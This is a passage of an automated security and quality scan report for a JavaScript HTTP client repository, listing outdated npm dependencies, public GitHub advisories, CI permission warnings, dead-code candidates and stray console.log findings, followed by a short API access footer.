`express` is pinned/resolved at 4.21.1 but the latest stable release on the npm registry is 5.2.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `formdata-node` is 1 major version(s) behind (5.0.1 -> 6.0.3)
`formdata-node` is pinned/resolved at 5.0.1 but the latest stable release on the npm registry is 6.0.3 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `formidable` is 1 major version(s) behind (2.1.2 -> 3.5.4)
`formidable` is pinned/resolved at 2.1.2 but the latest stable release on the npm registry is 3.5.4 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `get-stream` is 3 major version(s) behind (6.0.1 -> 9.0.1)
`get-stream` is pinned/resolved at 6.0.1 but the latest stable release on the npm registry is 9.0.1 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `gulp` is 1 major version(s) behind (4.0.2 -> 5.0.1)
`gulp` is pinned/resolved at 4.0.2 but the latest stable release on the npm registry is 5.0.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `proxy-from-env` is 1 major version(s) behind (1.1.0 -> 2.1.0)
`proxy-from-env` is pinned/resolved at 1.1.0 but the latest stable release on the npm registry is 2.1.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.88 picomatch: GHSA-3v7f-55p6-f55p
Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching
package-lock.json dependencylegacy
medium Legacy quality quality conf 0.78 Public web service has no security.txt
security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt.
.well-known/security.txt qualitylegacy
medium Legacy software dependency conf 0.88 qs: GHSA-6rw7-vpxm-498p
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 qs: GHSA-q8mj-m7cp-5q26
qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 request: GHSA-p8p7-x288-28g6
Server-Side Request Forgery in Request
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 serialize-javascript: GHSA-76p7-773f-r4q5
Cross-site Scripting (XSS) in serialize-javascript
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 serialize-javascript: GHSA-qj8w-gfj5-8c6v
Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 tar: GHSA-f5x3-32g6-xq36
Denial of service while parsing a tar file due to lack of folders count validation
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 tough-cookie: GHSA-72xf-g2v4-qvf3
tough-cookie Prototype Pollution vulnerability
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 uuid: GHSA-w5hq-g745-h8pq
uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 vm2: GHSA-2cm2-m3w5-gp2f
vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 vm2: GHSA-9g8x-92q2-p28f
NodeVM observability builtins leak host process and HTTP request data
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 vm2: GHSA-mpf8-4hx2-7cjg
vm2 Host Promise Resolution Preserves Object Identity Across Sandbox Boundary
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 vm2: GHSA-v27g-jcqj-v8rw
vm2 is Vulnerable to Host File Path Disclosure via Stack Trace Information Leak
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 vm2: GHSA-wp5r-2gw5-m7q7
vm2's Transformer Fast-Path Bypass Exposes Internal State Variable
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 ws: GHSA-58qx-3vcg-4xpx
ws: Uninitialized memory disclosure
package-lock.json dependencylegacy
medium 9-layer cicd supply-chain conf 1.00 GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions.
.github/workflows/release-branch.yml supply-chaingithub-actionsleast-privilege
medium 9-layer cicd supply-chain conf 1.00 GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions.
.github/workflows/publish.yml supply-chaingithub-actionsleast-privilege
medium 9-layer security coverage conf 1.00 No auth library detected
The scanner did not find any standard auth library (JWT, OAuth, NextAuth, Auth0, etc.). Either auth lives in custom code, in a separate service, or is missing.
coverageauth
low Legacy software dependency conf 0.88 brace-expansion: GHSA-v6h2-p8h4-qcjw
brace-expansion Regular Expression Denial of Service vulnerability
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 diff: GHSA-73rr-hh4g-fpgx
jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 elliptic: GHSA-848j-6mx2-7j84
Elliptic Uses a Cryptographic Primitive with a Risky Implementation
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 es5-ext: GHSA-4gmj-3p3h-gm8h
es5-ext vulnerable to Regular Expression Denial of Service in `function#copy` and `function#toStringTokens`
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 formidable: GHSA-75v8-2h7p-7m2m
Formidable relies on hexoid to prevent guessing of filenames for untrusted executable content
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 handlebars: GHSA-442j-39wm-28r2
Handlebars.js has a Property Access Validation Bypass in container.lookup
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 ip: GHSA-78xj-cgh5-2h22
NPM IP package incorrectly identifies some private IP addresses as public
package-lock.json dependencylegacy
low Legacy software dependency conf 0.90 npm package `@babel/core` is minor version(s) behind (7.23.9 -> 7.29.7)
`@babel/core` is pinned/resolved at 7.23.9 but the latest stable release on the npm registry is 7.29.7 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
low Legacy software dependency conf 0.90 npm package `@babel/preset-env` is minor version(s) behind (7.23.9 -> 7.29.7)
`@babel/preset-env` is pinned/resolved at 7.23.9 but the latest stable release on the npm registry is 7.29.7 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
low Legacy software dependency conf 0.90 npm package `auto-changelog` is minor version(s) behind (2.4.0 -> 2.6.0)
`auto-changelog` is pinned/resolved at 2.4.0 but the latest stable release on the npm registry is 2.6.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
low Legacy software dependency conf 0.90 npm package `follow-redirects` is minor version(s) behind (1.15.11 -> 1.16.0)
`follow-redirects` is pinned/resolved at 1.15.11 but the latest stable release on the npm registry is 1.16.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
low Legacy software dependency conf 0.90 npm package `fs-extra` is minor version(s) behind (11.2.0 -> 11.3.5)
`fs-extra` is pinned/resolved at 11.2.0 but the latest stable release on the npm registry is 11.3.5 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
low Legacy software dependency conf 0.88 qs: GHSA-w7fw-mjwx-w883
qs's arrayLimit bypass in comma parsing allows denial of service
package-lock.json dependencylegacy
low Legacy quality quality conf 0.74 robots.txt does not advertise a sitemap
Sitemap directives in robots.txt help crawlers and AI agents find the canonical public URL inventory quickly.
README.md qualitylegacy
low Legacy software dependency conf 0.88 semver-regex: GHSA-4x5v-gmq8-25ch
Regular expression denial of service in semver-regex
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 tmp: GHSA-52f5-9888-hmc6
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
package-lock.json dependencylegacy
low Legacy software dependency conf 0.88 vm2: GHSA-q3fm-4wcw-g57x
vm2 setup-sandbox.js violates Defense Invariant #11 in stack-trace formatter
package-lock.json dependencylegacy
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: eslint.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/cancelToken.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/isURLSameOrigin.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/settle.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/browser/toFormData.browser.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/cjs/tests/helpers/cjs-is-cancel-typing.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/cjs/tests/helpers/ts-require-default.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/cjs/tests/helpers/ts-require.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/fixture-cleanup.module.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/helpers/esm-functions.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/ts.module.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/tests/typings.module.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/module/esm/vitest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/setup/browser.setup.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/deno/tests/import.smoke.test.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/esm/tests/http2.smoke.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/esm/tests/import.smoke.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/smoke/esm/vitest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/api.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/cancel/canceledError.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/cancel/isCancel.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/composeSignals.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/core/buildFullPath.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/core/transformData.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/estimateDataURLDecodedBytes.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/fromDataURI.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/bind.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/combineURLs.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/formDataToJSON.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/isAbsoluteURL.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/isAxiosError.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/parseHeaders.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/progressEventReducer.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/spread.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/helpers/validator.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/parseProtocol.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/platform.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/query.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/regression.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/transformResponse.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/endsWith.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/forEach.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/isX.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/kindOf.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/kindOfTest.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/merge.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/toArray.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/toFlatObject.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: tests/unit/utils/trim.test.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer software dead-code-candidate conf 1.00 File has no detected symbols: vitest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
dead-code-candidate
low 9-layer quality integrity conf 1.00 Legacy-named symbol `FormDataLegacy` in tests/unit/adapters/http.test.js:24
Names with suffixes like `_old`, `_v1`, `_deprecated` usually indicate replaced-but-not-removed code (typical AI-coder leftover). Confirm and delete, or rename if it's the active version.
integritylegacy-markerdead-code
low 9-layer cicd supply-chain conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access.
package.json supply-chainnpminstall-scripts
low 9-layer cicd supply-chain conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access.
docs/package.json supply-chainnpminstall-scripts
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — docs/scripts/utils.js:4
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/post/server.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/postMultipartFormData/server.js:5
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/server.js:193
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — examples/upload/server.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — gulpfile.js:9
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — lib/utils.js:399
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — sandbox/client.js:10
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — sandbox/server.js:81
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — scripts/axios-build-instance.js:6
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/module/cjs/tests/helpers/cjs-is-cancel-typing.ts:11
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/module/cjs/tests/helpers/cjs-typing.ts:51
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/module/esm/tests/helpers/esm-index.ts:73
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/setup/server.js:68
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer frontend frontend-quality conf 1.00 Stray `console.log` in TS/JS — tests/unit/adapters/fetch.test.js:317
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
frontend-qualityfq.console-leak
low 9-layer quality complexity conf 1.00 Very large file: tests/unit/adapters/http.test.js (6178 lines)
Files with >800 lines often hide complexity hotspots and discourage tests.
complexity
For AI agents: Voting guide (TP/FP) MCP manifest Stdio wrapper SARIF Integrate Findings queue Vote TP/FP on findings to calibrate the engine.
For AI agents + API integrations
Email me when this repo regresses
Free. We re-scan periodically; new criticals → your inbox. No signup required for the scan itself.
API access

This page is publicly accessible at: https://repobility.com/scan/638bbbc9-da12-4b15-a037-c1489534a330/

To check status programmatically (no auth required): 

curl -s https://repobility.com/api/v1/public/scan/638bbbc9-da12-4b15-a037-c1489534a330/

Important — please don't re-submit the same URL repeatedly. The submission endpoint is idempotent: re-submitting the same git URL returns this same scan_token, not a new one. To re-scan this repo, sign up free and use the dashboard.